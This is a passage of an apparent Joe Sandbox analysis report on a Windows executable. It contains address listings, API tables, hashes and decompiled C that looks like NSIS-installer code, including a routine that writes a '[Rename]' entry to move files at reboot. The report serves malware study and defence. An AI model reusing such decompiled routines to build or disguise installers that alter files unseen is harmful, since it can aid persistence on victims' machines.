                                                  0x00405330
                                                  0x00405330
                                                  0x00405336
                                                  0x0040533d
                                                  0x00405340
                                                  0x00405340
                                                  0x00405346
                                                  0x0040534c
                                                  0x00405352
                                                  0x00405352
                                                  0x0040535f
                                                  0x004054c0
                                                  0x004054c7
                                                  0x004054e4
                                                  0x004054ea
                                                  0x004054fc
                                                  0x004054fc
                                                  0x00000000
                                                  0x00405365
                                                  0x00405367
                                                  0x0040536c
                                                  0x00405371
                                                  0x00405376
                                                  0x00405378
                                                  0x00405378
                                                  0x00405379
                                                  0x0040537a
                                                  0x0040537c
                                                  0x0040537c
                                                  0x00405384
                                                  0x004053c5
                                                  0x004053c7
                                                  0x004053d7
                                                  0x004053da
                                                  0x004053df
                                                  0x004053e6
                                                  0x004053e9
                                                  0x0040548b
                                                  0x00405494
                                                  0x0040549c
                                                  0x0040549c
                                                  0x004054a2
                                                  0x004054aa
                                                  0x004054bb
                                                  0x004054bb
                                                  0x00000000
                                                  0x004054aa
                                                  0x004053ef
                                                  0x004053f2
                                                  0x004053f8
                                                  0x004053fd
                                                  0x004053ff
                                                  0x00405401
                                                  0x00405407
                                                  0x0040540e
                                                  0x00405413
                                                  0x0040541a
                                                  0x0040541d
                                                  0x0040541d
                                                  0x00405424
                                                  0x00405430
                                                  0x00405434
                                                  0x00405436
                                                  0x00405436
                                                  0x00405426
                                                  0x00405428
                                                  0x00405428
                                                  0x00405456
                                                  0x00405462
                                                  0x00405471
                                                  0x00405471
                                                  0x00405473
                                                  0x00405476
                                                  0x0040547f
                                                  0x00000000
                                                  0x00405386
                                                  0x00405391
                                                  0x00405394
                                                  0x00405399
                                                  0x0040539b
                                                  0x0040539f
                                                  0x004053af
                                                  0x004053b9
                                                  0x004053bb
                                                  0x004053be
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004053a1
                                                  0x004053a1
                                                  0x004053a7
                                                  0x004053a9
                                                  0x004053a9
                                                  0x004053aa
                                                  0x004053ab
                                                  0x00000000
                                                  0x004053a1
                                                  0x00405384
                                                  0x0040535f
                                                  0x004052a2
                                                  0x00000000
                                                  0x004052b8
                                                  0x004052c2
                                                  0x004052c7
                                                  0x00000000
                                                  0x00000000
                                                  0x004052d9
                                                  0x004052de
                                                  0x004052ea
                                                  0x004052ea
                                                  0x004052ec
                                                  0x004052fb
                                                  0x004052fd
                                                  0x00405301
                                                  0x00405304
                                                  0x00000000
                                                  0x00405304
                                                  0x004052a2
                                                  0x00404f58
                                                  0x00404f5d
                                                  0x00404f66
                                                  0x00404f6d
                                                  0x00404f7f
                                                  0x00404f8a
                                                  0x00404f90
                                                  0x00404f9e
                                                  0x00404fb2
                                                  0x00404fb7
                                                  0x00404fc4
                                                  0x00404fc9
                                                  0x00404fdf
                                                  0x00404ff0
                                                  0x00404ffd
                                                  0x00404ffd
                                                  0x00405000
                                                  0x00405006
                                                  0x00405008
                                                  0x0040500b
                                                  0x00405010
                                                  0x00405015
                                                  0x00405017
                                                  0x00405017
                                                  0x00405037
                                                  0x00405037
                                                  0x00405039
                                                  0x0040503a
                                                  0x0040503f
                                                  0x00405045
                                                  0x00405049
                                                  0x0040504e
                                                  0x00405056
                                                  0x0040505a
                                                  0x0040505f
                                                  0x00405064
                                                  0x0040506c
                                                  0x0040506f
                                                  0x0040513f
                                                  0x00405152
                                                  0x00000000
                                                  0x00405075
                                                  0x00405078
                                                  0x0040507b
                                                  0x0040507e
                                                  0x0040507e
                                                  0x00405084
                                                  0x0040508d
                                                  0x00405090
                                                  0x00405094
                                                  0x00405097
                                                  0x0040509a
                                                  0x004050a3
                                                  0x004050ac
                                                  0x004050af
                                                  0x004050b2
                                                  0x004050b5
                                                  0x004050f3
                                                  0x0040511e
                                                  0x004050f5
                                                  0x00405104
                                                  0x00405104
                                                  0x004050b7
                                                  0x004050ba
                                                  0x004050c8
                                                  0x004050d2
                                                  0x004050da
                                                  0x004050e1
                                                  0x004050ec
                                                  0x004050ec
                                                  0x004050b5
                                                  0x00405124
                                                  0x00405125
                                                  0x00405131
                                                  0x00405131
                                                  0x0040513d
                                                  0x00405158
                                                  0x0040515b
                                                  0x00405178
                                                  0x00000000
                                                  0x0040515d
                                                  0x00405162
                                                  0x0040516b
                                                  0x004054fe
                                                  0x00405510
                                                  0x00405510
                                                  0x0040515b
                                                  0x00000000
                                                  0x0040513d
                                                  0x0040506f

                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                  • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                                  • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                  • DeleteObject.GDI32(00000000), ref: 00405000
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                    • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                  • ShowWindow.USER32(?,00000005), ref: 00405162
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                  • GlobalFree.KERNEL32(?), ref: 00405340
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                  • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                  • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                  • ShowWindow.USER32(00000000), ref: 004054FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 2564846305-813528018
                                                  • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                  • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                  • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                  • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                  				intOrPtr _v8;
                                                  				int _v12;
                                                  				void* _v16;
                                                  				struct HWND__* _t56;
                                                  				intOrPtr _t69;
                                                  				signed int _t75;
                                                  				signed short* _t76;
                                                  				signed short* _t78;
                                                  				long _t92;
                                                  				int _t103;
                                                  				signed int _t110;
                                                  				intOrPtr _t111;
                                                  				intOrPtr _t113;
                                                  				WCHAR* _t114;
                                                  				signed int* _t116;
                                                  				WCHAR* _t117;
                                                  				struct HWND__* _t118;
                                                  
                                                  				if(_a8 != 0x110) {
                                                  					if(_a8 != 0x111) {
                                                  						L13:
                                                  						if(_a8 != 0x4e) {
                                                  							if(_a8 == 0x40b) {
                                                  								 *0x42b234 =  *0x42b234 + 1;
                                                  							}
                                                  							L27:
                                                  							_t114 = _a16;
                                                  							L28:
                                                  							return E00404500(_a8, _a12, _t114);
                                                  						}
                                                  						_t56 = GetDlgItem(_a4, 0x3e8);
                                                  						_t114 = _a16;
                                                  						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                  							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                  							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                  							_v12 = _t103;
                                                  							_v16 = _t113;
                                                  							_v8 = 0x432ea0;
                                                  							if(_t103 - _t113 < 0x800) {
                                                  								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                  								SetCursor(LoadCursorW(0, 0x7f02));
                                                  								_push(1);
                                                  								E00404907(_a4, _v8);
                                                  								SetCursor(LoadCursorW(0, 0x7f00));
                                                  								_t114 = _a16;
                                                  							}
                                                  						}
                                                  						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                  							goto L28;
                                                  						} else {
                                                  							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                  								SendMessageW( *0x434f08, 0x111, 1, 0);
                                                  							}
                                                  							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                  								SendMessageW( *0x434f08, 0x10, 0, 0);
                                                  							}
                                                  							return 1;
                                                  						}
                                                  					}
                                                  					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
                                                  						goto L27;
                                                  					} else {
                                                  						_t69 =  *0x42c240; // 0x86dd5c
                                                  						_t29 = _t69 + 0x14; // 0x86dd70
                                                  						_t116 = _t29;
                                                  						if(( *_t116 & 0x00000020) == 0) {
                                                  							goto L27;
                                                  						}
                                                  						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                  						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                  						E004048E3();
                                                  						goto L13;
                                                  					}
                                                  				}
                                                  				_t117 = _a16;
                                                  				_t75 =  *(_t117 + 0x30);
                                                  				if(_t75 < 0) {
                                                  					_t111 =  *0x433edc; // 0x874466
                                                  					_t75 =  *(_t111 - 4 + _t75 * 4);
                                                  				}
                                                  				_t76 =  *0x434f38 + _t75 * 2;
                                                  				_t110 =  *_t76 & 0x0000ffff;
                                                  				_a8 = _t110;
                                                  				_t78 =  &(_t76[1]);
                                                  				_a16 = _t78;
                                                  				_v16 = _t78;
                                                  				_v12 = 0;
                                                  				_v8 = E00404609;
                                                  				if(_t110 != 2) {
                                                  					_v8 = E004045CF;
                                                  				}
                                                  				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                  				_push(0x22);
                                                  				E00404499(_a4);
                                                  				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                  				_push(0x23);
                                                  				E00404499(_a4);
                                                  				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                  				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                  				_t118 = GetDlgItem(_a4, 0x3e8);
                                                  				E004044CE(_t118);
                                                  				SendMessageW(_t118, 0x45b, 1, 0);
                                                  				_t92 =  *( *0x434f10 + 0x68);
                                                  				if(_t92 < 0) {
                                                  					_t92 = GetSysColor( ~_t92);
                                                  				}
                                                  				SendMessageW(_t118, 0x443, 0, _t92);
                                                  				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                  				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                  				 *0x42b234 = 0;
                                                  				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                  				 *0x42b234 = 0;
                                                  				return 0;
                                                  			}




















                                                  0x0040466a
                                                  0x00404797
                                                  0x004047f4
                                                  0x004047f8
                                                  0x004048c5
                                                  0x004048c7
                                                  0x004048c7
                                                  0x004048cd
                                                  0x004048cd
                                                  0x004048d0
                                                  0x00000000
                                                  0x004048d7
                                                  0x00404806
                                                  0x0040480c
                                                  0x00404816
                                                  0x00404821
                                                  0x00404824
                                                  0x00404827
                                                  0x00404832
                                                  0x00404835
                                                  0x0040483c
                                                  0x00404849
                                                  0x0040485a
                                                  0x00404860
                                                  0x00404868
                                                  0x00404876
                                                  0x0040487c
                                                  0x0040487c
                                                  0x0040483c
                                                  0x00404886
                                                  0x00000000
                                                  0x00404891
                                                  0x00404895
                                                  0x004048a5
                                                  0x004048a5
                                                  0x004048ab
                                                  0x004048b7
                                                  0x004048b7
                                                  0x00000000
                                                  0x004048bb
                                                  0x00404886
                                                  0x004047a2
                                                  0x00000000
                                                  0x004047b4
                                                  0x004047b4
                                                  0x004047b9
                                                  0x004047b9
                                                  0x004047bf
                                                  0x00000000
                                                  0x00000000
                                                  0x004047e8
                                                  0x004047ea
                                                  0x004047ef
                                                  0x00000000
                                                  0x004047ef
                                                  0x004047a2
                                                  0x00404670
                                                  0x00404673
                                                  0x00404678
                                                  0x0040467a
                                                  0x00404689
                                                  0x00404689
                                                  0x00404691
                                                  0x00404694
                                                  0x00404698
                                                  0x0040469b
                                                  0x0040469f
                                                  0x004046a2
                                                  0x004046a5
                                                  0x004046a8
                                                  0x004046af
                                                  0x004046b1
                                                  0x004046b1
                                                  0x004046bb
                                                  0x004046c8
                                                  0x004046d2
                                                  0x004046d7
                                                  0x004046da
                                                  0x004046df
                                                  0x004046f6
                                                  0x004046fd
                                                  0x00404710
                                                  0x00404713
                                                  0x00404727
                                                  0x0040472e
                                                  0x00404733
                                                  0x00404738
                                                  0x00404738
                                                  0x00404746
                                                  0x00404754
                                                  0x00404766
                                                  0x0040476b
                                                  0x0040477b
                                                  0x0040477d
                                                  0x00000000

                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                  • GetSysColor.USER32(?), ref: 00404738
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                  • lstrlenW.KERNEL32(?), ref: 00404759
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                  • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                  • SendMessageW.USER32(00000000), ref: 004047DB
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                  • SetCursor.USER32(00000000), ref: 0040485A
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                  • SetCursor.USER32(00000000), ref: 00404876
                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: Call$N
                                                  • API String ID: 3103080414-3438112850
                                                  • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                  • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                  • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                  • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 90%
                                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                  				struct tagLOGBRUSH _v16;
                                                  				struct tagRECT _v32;
                                                  				struct tagPAINTSTRUCT _v96;
                                                  				struct HDC__* _t70;
                                                  				struct HBRUSH__* _t87;
                                                  				struct HFONT__* _t94;
                                                  				long _t102;
                                                  				signed int _t126;
                                                  				struct HDC__* _t128;
                                                  				intOrPtr _t130;
                                                  
                                                  				if(_a8 == 0xf) {
                                                  					_t130 =  *0x434f10;
                                                  					_t70 = BeginPaint(_a4,  &_v96);
                                                  					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                  					_a8 = _t70;
                                                  					GetClientRect(_a4,  &_v32);
                                                  					_t126 = _v32.bottom;
                                                  					_v32.bottom = _v32.bottom & 0x00000000;
                                                  					while(_v32.top < _t126) {
                                                  						_a12 = _t126 - _v32.top;
                                                  						asm("cdq");
                                                  						asm("cdq");
                                                  						asm("cdq");
                                                  						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                  						_t87 = CreateBrushIndirect( &_v16);
                                                  						_v32.bottom = _v32.bottom + 4;
                                                  						_a16 = _t87;
                                                  						FillRect(_a8,  &_v32, _t87);
                                                  						DeleteObject(_a16);
                                                  						_v32.top = _v32.top + 4;
                                                  					}
                                                  					if( *(_t130 + 0x58) != 0xffffffff) {
                                                  						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                  						_a16 = _t94;
                                                  						if(_t94 != 0) {
                                                  							_t128 = _a8;
                                                  							_v32.left = 0x10;
                                                  							_v32.top = 8;
                                                  							SetBkMode(_t128, 1);
                                                  							SetTextColor(_t128,  *(_t130 + 0x58));
                                                  							_a8 = SelectObject(_t128, _a16);
                                                  							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
                                                  							SelectObject(_t128, _a8);
                                                  							DeleteObject(_a16);
                                                  						}
                                                  					}
                                                  					EndPaint(_a4,  &_v96);
                                                  					return 0;
                                                  				}
                                                  				_t102 = _a16;
                                                  				if(_a8 == 0x46) {
                                                  					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                  					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
                                                  				}
                                                  				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                  			}













                                                  0x0040100a
                                                  0x00401039
                                                  0x00401047
                                                  0x0040104d
                                                  0x00401051
                                                  0x0040105b
                                                  0x00401061
                                                  0x00401064
                                                  0x004010f3
                                                  0x00401089
                                                  0x0040108c
                                                  0x004010a6
                                                  0x004010bd
                                                  0x004010cc
                                                  0x004010cf
                                                  0x004010d5
                                                  0x004010d9
                                                  0x004010e4
                                                  0x004010ed
                                                  0x004010ef
                                                  0x004010ef
                                                  0x00401100
                                                  0x00401105
                                                  0x0040110d
                                                  0x00401110
                                                  0x00401112
                                                  0x00401118
                                                  0x0040111f
                                                  0x00401126
                                                  0x00401130
                                                  0x00401142
                                                  0x00401156
                                                  0x00401160
                                                  0x00401165
                                                  0x00401165
                                                  0x00401110
                                                  0x0040116e
                                                  0x00000000
                                                  0x00401178
                                                  0x00401010
                                                  0x00401013
                                                  0x00401015
                                                  0x0040101f
                                                  0x0040101f
                                                  0x00000000

                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                  • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                  • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                  • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00406183(void* __ecx) {
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				long _t12;
                                                  				long _t24;
                                                  				char* _t31;
                                                  				int _t37;
                                                  				void* _t38;
                                                  				intOrPtr* _t39;
                                                  				long _t42;
                                                  				WCHAR* _t44;
                                                  				void* _t46;
                                                  				void* _t48;
                                                  				void* _t49;
                                                  				void* _t52;
                                                  				void* _t53;
                                                  
                                                  				_t38 = __ecx;
                                                  				_t44 =  *(_t52 + 0x14);
                                                  				 *0x430908 = 0x55004e;
                                                  				 *0x43090c = 0x4c;
                                                  				if(_t44 == 0) {
                                                  					L3:
                                                  					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
                                                  					if(_t12 != 0 && _t12 <= 0x400) {
                                                  						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
                                                  						_t53 = _t52 + 0x10;
                                                  						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
                                                  						_t12 = E0040602D(0x431108, 0xc0000000, 4);
                                                  						_t48 = _t12;
                                                  						 *(_t53 + 0x18) = _t48;
                                                  						if(_t48 != 0xffffffff) {
                                                  							_t42 = GetFileSize(_t48, 0);
                                                  							_t6 = _t37 + 0xa; // 0xa
                                                  							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                  							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
                                                  								L18:
                                                  								return CloseHandle(_t48);
                                                  							} else {
                                                  								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
                                                  									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
                                                  									if(_t49 == 0) {
                                                  										_t48 =  *(_t53 + 0x18);
                                                  										L16:
                                                  										_t24 = _t42;
                                                  										L17:
                                                  										E00405FE8(_t24 + _t46, 0x430508, _t37);
                                                  										SetFilePointer(_t48, 0, 0, 0);
                                                  										E004060DF(_t48, _t46, _t42 + _t37);
                                                  										GlobalFree(_t46);
                                                  										goto L18;
                                                  									}
                                                  									_t39 = _t46 + _t42;
                                                  									_t31 = _t39 + _t37;
                                                  									while(_t39 > _t49) {
                                                  										 *_t31 =  *_t39;
                                                  										_t31 = _t31 - 1;
                                                  										_t39 = _t39 - 1;
                                                  									}
                                                  									_t24 = _t49 - _t46 + 1;
                                                  									_t48 =  *(_t53 + 0x18);
                                                  									goto L17;
                                                  								}
                                                  								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                  								_t42 = _t42 + 0xa;
                                                  								goto L16;
                                                  							}
                                                  						}
                                                  					}
                                                  				} else {
                                                  					CloseHandle(E0040602D(_t44, 0, 1));
                                                  					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
                                                  					if(_t12 != 0 && _t12 <= 0x400) {
                                                  						goto L3;
                                                  					}
                                                  				}
                                                  				return _t12;
                                                  			}



















                                                  0x00406183
                                                  0x0040618c
                                                  0x00406193
                                                  0x0040619d
                                                  0x004061b1
                                                  0x004061d9
                                                  0x004061e4
                                                  0x004061e8
                                                  0x00406208
                                                  0x0040620f
                                                  0x00406219
                                                  0x00406226
                                                  0x0040622b
                                                  0x00406230
                                                  0x00406234
                                                  0x00406243
                                                  0x00406245
                                                  0x00406252
                                                  0x00406256
                                                  0x004062f1
                                                  0x00000000
                                                  0x0040626c
                                                  0x00406279
                                                  0x0040629d
                                                  0x004062a1
                                                  0x004062c0
                                                  0x004062c4
                                                  0x004062c4
                                                  0x004062c6
                                                  0x004062cf
                                                  0x004062da
                                                  0x004062e5
                                                  0x004062eb
                                                  0x00000000
                                                  0x004062eb
                                                  0x004062a3
                                                  0x004062a6
                                                  0x004062b1
                                                  0x004062ad
                                                  0x004062af
                                                  0x004062b0
                                                  0x004062b0
                                                  0x004062b8
                                                  0x004062ba
                                                  0x00000000
                                                  0x004062ba
                                                  0x00406284
                                                  0x0040628a
                                                  0x00000000
                                                  0x0040628a
                                                  0x00406256
                                                  0x00406234
                                                  0x004061b3
                                                  0x004061be
                                                  0x004061c7
                                                  0x004061cb
                                                  0x00000000
                                                  0x00000000
                                                  0x004061cb
                                                  0x004062fc

                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
